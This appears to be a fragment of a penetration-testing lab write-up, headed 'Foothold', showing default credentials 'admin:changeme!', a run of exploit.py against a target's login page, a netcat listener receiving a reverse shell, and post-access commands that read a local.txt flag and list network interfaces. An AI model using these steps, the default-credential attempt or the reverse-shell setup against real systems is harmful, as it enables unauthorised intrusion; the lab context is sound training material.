Foothold

admin:changeme!

❯ python3 exploit.py 192.168.45.178 8338 http://192.168.181.32:8338
Running exploit on http://192.168.181.32:8338/login

❯ nc -lnvp 8338
listening on [any] 8338 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.181.32] 52596
$ id
id
uid=1001(snort) gid=1001(snort) groups=1001(snort)
$ whoami && cat /home/snort/local.txt && ip addr
whoami && cat /home/snort/local.txt && ip addr
snort
6b3833eb5afb8275dca95152df516332
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:8f:20 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.181.32/24 brd 192.168.181.255 scope global ens160
       valid_lft forever preferred_lft forever